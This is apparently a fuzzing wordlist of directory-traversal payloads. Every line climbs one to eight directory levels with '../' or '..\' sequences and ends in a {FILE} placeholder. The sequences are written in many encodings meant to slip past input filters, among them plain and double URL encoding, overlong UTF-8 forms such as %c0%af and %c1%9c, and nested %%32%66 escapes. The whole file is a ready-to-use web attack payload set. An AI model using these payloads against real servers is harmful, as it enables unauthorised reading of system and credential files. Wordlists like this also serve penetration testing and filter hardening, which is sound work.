%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
%252e%252e%255c{FILE}
%252e%252e%255c%252e%252e%255c{FILE}
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
..%c0%af{FILE}
..%c0%af..%c0%af{FILE}
..%c0%af..%c0%af..%c0%af{FILE}
..%c0%af..%c0%af..%c0%af..%c0%af{FILE}
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}
%c0%ae%c0%ae/{FILE}
%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}
%c0%ae%c0%ae%c0%af{FILE}
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}
..%25c0%25af{FILE}
..%25c0%25af..%25c0%25af{FILE}
..%25c0%25af..%25c0%25af..%25c0%25af{FILE}
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}
%25c0%25ae%25c0%25ae/{FILE}
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}
%25c0%25ae%25c0%25ae%25c0%25af{FILE}
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}
..%c1%9c{FILE}
..%c1%9c..%c1%9c{FILE}
..%c1%9c..%c1%9c..%c1%9c{FILE}
..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}
%c0%ae%c0%ae\{FILE}
%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}
%c0%ae%c0%ae%c1%9c{FILE}
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}
..%25c1%259c{FILE}
..%25c1%259c..%25c1%259c{FILE}
..%25c1%259c..%25c1%259c..%25c1%259c{FILE}
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}
%25c0%25ae%25c0%25ae\{FILE}
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}
%25c0%25ae%25c0%25ae%25c1%259c{FILE}
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}
..%%32%66{FILE}
..%%32%66..%%32%66{FILE}
..%%32%66..%%32%66..%%32%66{FILE}
..%%32%66..%%32%66..%%32%66..%%32%66{FILE}
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}
%%32%65%%32%65/{FILE}
%%32%65%%32%65/%%32%65%%32%65/{FILE}
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
%%32%65%%32%65%%32%66{FILE}
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}
..%%35%63{FILE}
..%%35%63..%%35%63{FILE}
..%%35%63..%%35%63..%%35%63{FILE}
..%%35%63..%%35%63..%%35%63..%%35%63{FILE}
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}
%%32%65%%32%65/{FILE}
%%32%65%%32%65/%%32%65%%32%65/{FILE}
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
%%32%65%%32%65%%35%63{FILE}
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}
../{FILE}
../../{FILE}
../../../{FILE}
../../../../{FILE}
../../../../../{FILE}
../../../../../../{FILE}
../../../../../../../{FILE}
../../../../../../../../{FILE}
..%2f{FILE}
..%2f..%2f{FILE}
..%2f..%2f..%2f{FILE}
..%2f..%2f..%2f..%2f{FILE}
..%2f..%2f..%2f..%2f..%2f{FILE}
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}
%2e%2e/{FILE}
%2e%2e/%2e%2e/{FILE}
%2e%2e/%2e%2e/%2e%2e/{FILE}
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
%2e%2e%2f{FILE}
%2e%2e%2f%2e%2e%2f{FILE}
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
..%252f{FILE}
..%252f..%252f{FILE}
..%252f..%252f..%252f{FILE}
..%252f..%252f..%252f..%252f{FILE}
..%252f..%252f..%252f..%252f..%252f{FILE}
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}
%252e%252e/{FILE}
%252e%252e/%252e%252e/{FILE}
%252e%252e/%252e%252e/%252e%252e/{FILE}
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
%252e%252e%252f{FILE}
%252e%252e%252f%252e%252e%252f{FILE}
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
..\{FILE}
..\..\{FILE}
..\..\..\{FILE}
..\..\..\..\{FILE}
..\..\..\..\..\{FILE}
..\..\..\..\..\..\{FILE}
..\..\..\..\..\..\..\{FILE}
..\..\..\..\..\..\..\..\{FILE}
..%5c{FILE}
..%5c..%5c{FILE}
..%5c..%5c..%5c{FILE}
..%5c..%5c..%5c..%5c{FILE}
..%5c..%5c..%5c..%5c..%5c{FILE}
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
%2e%2e\{FILE}
%2e%2e\%2e%2e\{FILE}
%2e%2e\%2e%2e\%2e%2e\{FILE}
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
%2e%2e%5c{FILE}
%2e%2e%5c%2e%2e%5c{FILE}
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
..%255c{FILE}
..%255c..%255c{FILE}
..%255c..%255c..%255c{FILE}
..%255c..%255c..%255c..%255c{FILE}
..%255c..%255c..%255c..%255c..%255c{FILE}
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
%252e%252e\{FILE}
%252e%252e\%252e%252e\{FILE}
%252e%252e\%252e%252e\%252e%252e\{FILE}
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
%252e%252e%255c{FILE}
%252e%252e%255c%252e%252e%255c{FILE}
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
../{FILE}
../../{FILE}
../../../{FILE}
../../../../{FILE}
../../../../../{FILE}
../../../../../../{FILE}
../../../../../../../{FILE}
../../../../../../../../{FILE}
..%2f{FILE}
..%2f..%2f{FILE}
..%2f..%2f..%2f{FILE}
..%2f..%2f..%2f..%2f{FILE}
..%2f..%2f..%2f..%2f..%2f{FILE}
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}
%2e%2e/{FILE}
%2e%2e/%2e%2e/{FILE}
%2e%2e/%2e%2e/%2e%2e/{FILE}
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
%2e%2e%2f{FILE}
%2e%2e%2f%2e%2e%2f{FILE}
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
..%252f{FILE}
..%252f..%252f{FILE}
..%252f..%252f..%252f{FILE}
..%252f..%252f..%252f..%252f{FILE}
..%252f..%252f..%252f..%252f..%252f{FILE}
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}
%252e%252e/{FILE}
%252e%252e/%252e%252e/{FILE}
%252e%252e/%252e%252e/%252e%252e/{FILE}
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
